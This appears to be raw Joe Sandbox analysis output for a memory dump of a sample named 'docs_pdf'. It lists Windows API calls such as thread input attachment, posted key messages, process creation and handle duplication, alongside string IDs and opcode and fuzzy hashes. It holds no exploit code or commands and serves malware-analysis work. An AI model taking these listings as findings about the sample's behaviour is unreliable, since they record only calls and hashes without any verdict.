                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: b88c09a65fcd4551befd7760f1fd4d1f3f7c581ee29cfefca7a87c300a960488
                                    • Instruction ID: d428527255ef16e41823abfaf58cfe632c7da56cf91f30f26bd62cbd030a823f
                                    • Opcode Fuzzy Hash: b88c09a65fcd4551befd7760f1fd4d1f3f7c581ee29cfefca7a87c300a960488
                                    • Instruction Fuzzy Hash: 3E115C36648303BEFA122525DC07DA677DC9B08368F10001BFA44E44D3FE775500DB49
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 01028BEC
                                    • CoInitialize.OLE32(00000000), ref: 01028C19
                                    • CoUninitialize.OLE32 ref: 01028C23
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01028D23
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01028E50
                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01042C0C), ref: 01028E84
                                    • CoGetObject.OLE32(?,00000000,01042C0C,?), ref: 01028EA7
                                    • SetErrorMode.KERNEL32(00000000), ref: 01028EBA
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01028F3A
                                    • VariantClear.OLEAUT32(?), ref: 01028F4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: a6d1e89cf23a23339d68f620c52e72635c320b867f19486512ccd2ff8e551394
                                    • Instruction ID: 45c0f1a8ed5144b630111f90c37c90e15141e0568ab67b21934a6b4f9552d099
                                    • Opcode Fuzzy Hash: a6d1e89cf23a23339d68f620c52e72635c320b867f19486512ccd2ff8e551394
                                    • Instruction Fuzzy Hash: 1DC13775608316AFD700DF68C88496BBBE9FF88348F00895EF5899B251DB71ED05CB52
                                    APIs
                                    • __swprintf.LIBCMT ref: 0101419D
                                    • __swprintf.LIBCMT ref: 010141AA
                                      • Part of subcall function 00FD38D8: __woutput_l.LIBCMT ref: 00FD3931
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 010141D4
                                    • LoadResource.KERNEL32(?,00000000), ref: 010141E0
                                    • LockResource.KERNEL32(00000000), ref: 010141ED
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0101420D
                                    • LoadResource.KERNEL32(?,00000000), ref: 0101421F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 0101422E
                                    • LockResource.KERNEL32(?), ref: 0101423A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0101429B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 0b63bdb356f4faf6c3785191e6ad80d67bb26226f729cec8cfcd6cc9027f31ba
                                    • Instruction ID: 3f1e78902ea010129423932ef118e2a907a6c277375d69095e48723e08816113
                                    • Opcode Fuzzy Hash: 0b63bdb356f4faf6c3785191e6ad80d67bb26226f729cec8cfcd6cc9027f31ba
                                    • Instruction Fuzzy Hash: C431BD75A0120AABDB219F60DC48EFF7BACEF04341F044526F981E2154D77DDA51CBA1
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 01011700
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01010778,?,00000001), ref: 01011714
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0101171B
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 0101172A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0101173C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 01011755
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01010778,?,00000001), ref: 01011767
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117AC
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117C1
                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01010778,?,00000001), ref: 010117CC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: e5824fe5bfb839b1043b3fbaf004beb00726498fe5fdea7e7c79693b2c5deeb5
                                    • Instruction ID: d29a7e2bb2a8ff74d1259f97557ca753c5c5a2a4ca40f6ab61fe586b52b1b2ce
                                    • Opcode Fuzzy Hash: e5824fe5bfb839b1043b3fbaf004beb00726498fe5fdea7e7c79693b2c5deeb5
                                    • Instruction Fuzzy Hash: 5F31A075A00205ABEB269F38D988F693BFDFB09751F104055FA80D6389D77E9940CB91
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FBFC06
                                    • OleUninitialize.OLE32(?,00000000), ref: 00FBFCA5
                                    • UnregisterHotKey.USER32(?), ref: 00FBFDFC
                                    • DestroyWindow.USER32(?), ref: 00FF4A00
                                    • FreeLibrary.KERNEL32(?), ref: 00FF4A65
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FF4A92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 0f0b7cd9e7afd0448a26bbc89549b0094705744f4bff13bafd3c21ac463f8e14
                                    • Instruction ID: 1c07a10a302d83a000ede2aece2cce1c54e7b1c51b3097dbb2654fab7c36f158
                                    • Opcode Fuzzy Hash: 0f0b7cd9e7afd0448a26bbc89549b0094705744f4bff13bafd3c21ac463f8e14
                                    • Instruction Fuzzy Hash: E3A18171B01212CFCB29EF15C994B7AF764AF04710F1442ADE906AB261CB38ED16EF54
                                    APIs
                                    • EnumChildWindows.USER32(?,0100AA64), ref: 0100A9A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: a4923b97d492f3d10c702457f75df80441c1c7f88fcec4c4d787c65792850a86
                                    • Instruction ID: fa897727cbd0ffe2dd07792e30e7dc3ec9eaacd43ac1cae6f72fd22aa954d691
                                    • Opcode Fuzzy Hash: a4923b97d492f3d10c702457f75df80441c1c7f88fcec4c4d787c65792850a86
                                    • Instruction Fuzzy Hash: 1D918330B00706EAEB49DF64C881BEDFBB5BF04304F04815AE5DAA7291DF346A59DB90
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FB2EAE
                                      • Part of subcall function 00FB1DB3: GetClientRect.USER32(?,?), ref: 00FB1DDC
                                      • Part of subcall function 00FB1DB3: GetWindowRect.USER32(?,?), ref: 00FB1E1D
                                      • Part of subcall function 00FB1DB3: ScreenToClient.USER32(?,?), ref: 00FB1E45
                                    • GetDC.USER32 ref: 00FECF82
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FECF95
                                    • SelectObject.GDI32(00000000,00000000), ref: 00FECFA3
                                    • SelectObject.GDI32(00000000,00000000), ref: 00FECFB8
                                    • ReleaseDC.USER32(?,00000000), ref: 00FECFC0
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FED04B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: 6d7f22d83097da5e68a6a9ed1a7f4b28f08eb75732b0b749de84a687fd00c8cf
                                    • Instruction ID: 3d9367341f40b8bb80a72b9c0abc9639e75b738c557dbfe10cff30d7797e4d3a
                                    • Opcode Fuzzy Hash: 6d7f22d83097da5e68a6a9ed1a7f4b28f08eb75732b0b749de84a687fd00c8cf
                                    • Instruction Fuzzy Hash: 6871B631900285DFCF218F66C884AEA7BB6FF49360F18426AFD955A159C7358C42FF61
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                      • Part of subcall function 00FB2344: GetCursorPos.USER32(?), ref: 00FB2357
                                      • Part of subcall function 00FB2344: ScreenToClient.USER32(010767B0,?), ref: 00FB2374
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000001), ref: 00FB2399
                                      • Part of subcall function 00FB2344: GetAsyncKeyState.USER32(00000002), ref: 00FB23A7
                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0103C2E4
                                    • ImageList_EndDrag.COMCTL32 ref: 0103C2EA
                                    • ReleaseCapture.USER32 ref: 0103C2F0
                                    • SetWindowTextW.USER32(?,00000000), ref: 0103C39A
                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0103C3AD
                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0103C48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                    • API String ID: 1924731296-2107944366
                                    • Opcode ID: 94e407d2926245f34b5e723e29fad66ad8923ff6a9554b3872741e56cb2c14f4
                                    • Instruction ID: 1b79591da394daa5d696f20482c3a8538d0650d4416eadd710abcb59c9b16e69
                                    • Opcode Fuzzy Hash: 94e407d2926245f34b5e723e29fad66ad8923ff6a9554b3872741e56cb2c14f4
                                    • Instruction Fuzzy Hash: 4A51AE70604305AFE714EF24C855FAA7BE9FB88310F00851DF5969B2A1CB7A9944DB52
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0103F910), ref: 0102903D
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0103F910), ref: 01029071
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 010291EB
                                    • SysFreeString.OLEAUT32(?), ref: 01029215
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 0564324432c7b57b2f10f59a47f9c9f3164f67f271309c91235d72ac9871e7af
                                    • Instruction ID: ead3dbed686c7ccb82630e544b8130e45be4f45d8245acf21b4bab3ee6bed0c5
                                    • Opcode Fuzzy Hash: 0564324432c7b57b2f10f59a47f9c9f3164f67f271309c91235d72ac9871e7af
                                    • Instruction Fuzzy Hash: ADF13B71A00129EFDF54DF98C888EAEB7B9FF89318F108099F555AB251CB31AE45CB50
                                    APIs
                                    • _memset.LIBCMT ref: 0102F9C9
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102FB5C
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0102FB80
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102FBC0
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0102FBE2
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0102FD5E
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0102FD90
                                    • CloseHandle.KERNEL32(?), ref: 0102FDBF
                                    • CloseHandle.KERNEL32(?), ref: 0102FE36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 021a636d4641c5b3b1b4a6320017cf562c4791813fc1684a59031af3a3cdf898
                                    • Instruction ID: 35842b8a3957a6d5ebe8784e521316dc8148b1ee3539d498107bf1fc54b3bdb9
                                    • Opcode Fuzzy Hash: 021a636d4641c5b3b1b4a6320017cf562c4791813fc1684a59031af3a3cdf898
                                    • Instruction Fuzzy Hash: 45E1B0316042129FDB15EF28C881B6ABBF5AF84390F18855DF9D98B2A2CB75DC44CF52
                                    APIs
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010138D3,?), ref: 010148C7
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010138D3,?), ref: 010148E0
                                      • Part of subcall function 01014CD3: GetFileAttributesW.KERNEL32(?,01013947), ref: 01014CD4
                                    • lstrcmpiW.KERNEL32(?,?), ref: 01014FE2
                                    • _wcscmp.LIBCMT ref: 01014FFC
                                    • MoveFileW.KERNEL32(?,?), ref: 01015017
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: 10d5091bbdb7151270593e45d837e27d78211715a6153326da9893c69c675185
                                    • Instruction ID: c791e8afc60a11eb7710dd732d4699ab8980835d047fdf644ec9fc55e2dcd02f
                                    • Opcode Fuzzy Hash: 10d5091bbdb7151270593e45d837e27d78211715a6153326da9893c69c675185
                                    • Instruction Fuzzy Hash: 625186B24083859BC761EB94DC819DFB7ECAF85300F04492FB2C9D7155EF79A1888766
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0103896E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 7213c82500681681f757d86d89daf74f3f849564cad472d0ff211d5a555d881d
                                    • Instruction ID: 755db80cc4950a95cc52b91bcdf3456fbde56e791f74c66881ac78e1ae86639c
                                    • Opcode Fuzzy Hash: 7213c82500681681f757d86d89daf74f3f849564cad472d0ff211d5a555d881d
                                    • Instruction Fuzzy Hash: BC51E130A00609BBFF359F28DC85B993BACBB85350F108293F691E62D1C775A980CB41
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FEC547
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FEC569
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FEC581
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FEC59F
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FEC5C0
                                    • DestroyIcon.USER32(00000000), ref: 00FEC5CF
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FEC5EC
                                    • DestroyIcon.USER32(?), ref: 00FEC5FB
                                      • Part of subcall function 0103A71E: DeleteObject.GDI32(00000000), ref: 0103A757
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                    • String ID:
                                    • API String ID: 2819616528-0
                                    • Opcode ID: f0ee693062900784a648847fec7017eb9c79d5a5f1738fe6762c8b7bd8ff833b
                                    • Instruction ID: e40190cb74a3c9fbb1770c17867a2b4e4fdc9f9e4042af3904f7e57f700a470d
                                    • Opcode Fuzzy Hash: f0ee693062900784a648847fec7017eb9c79d5a5f1738fe6762c8b7bd8ff833b
                                    • Instruction Fuzzy Hash: 03516970A00209AFDB24DF26CC45FAA3BA9FB58360F104518F946E7290DB75ED91EF90
                                    APIs
                                      • Part of subcall function 0100AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0100AE77
                                      • Part of subcall function 0100AE57: GetCurrentThreadId.KERNEL32 ref: 0100AE7E
                                      • Part of subcall function 0100AE57: AttachThreadInput.USER32(00000000,?,01009B65,?,00000001), ref: 0100AE85
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009B70
                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 01009B8D
                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 01009B90
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009B99
                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01009BB7
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01009BBA
                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 01009BC3
                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01009BDA
                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 01009BDD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                    • String ID:
                                    • API String ID: 2014098862-0
                                    • Opcode ID: 5ce627ccfb15009a1a8c2132eb93313b9b4308306d21f75da440e6ef55a30cc0
                                    • Instruction ID: 263b912197355eda2759dfe75ce716af1e7a5b0071914917e3fcd8aea76a505b
                                    • Opcode Fuzzy Hash: 5ce627ccfb15009a1a8c2132eb93313b9b4308306d21f75da440e6ef55a30cc0
                                    • Instruction Fuzzy Hash: 5911E571950619BEF6206B70DC49FAA3B1DDB4C755F100415F284AB0D0CAF35C10DBA5
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,01008A84,00000B00,?,?), ref: 01008E0C
                                    • HeapAlloc.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E13
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01008A84,00000B00,?,?), ref: 01008E28
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,01008A84,00000B00,?,?), ref: 01008E30
                                    • DuplicateHandle.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E33
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,01008A84,00000B00,?,?), ref: 01008E43
                                    • GetCurrentProcess.KERNEL32(01008A84,00000000,?,01008A84,00000B00,?,?), ref: 01008E4B
                                    • DuplicateHandle.KERNEL32(00000000,?,01008A84,00000B00,?,?), ref: 01008E4E
                                    • CreateThread.KERNEL32(00000000,00000000,01008E74,00000000,00000000,00000000), ref: 01008E68
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                    • String ID:
                                    • API String ID: 1957940570-0
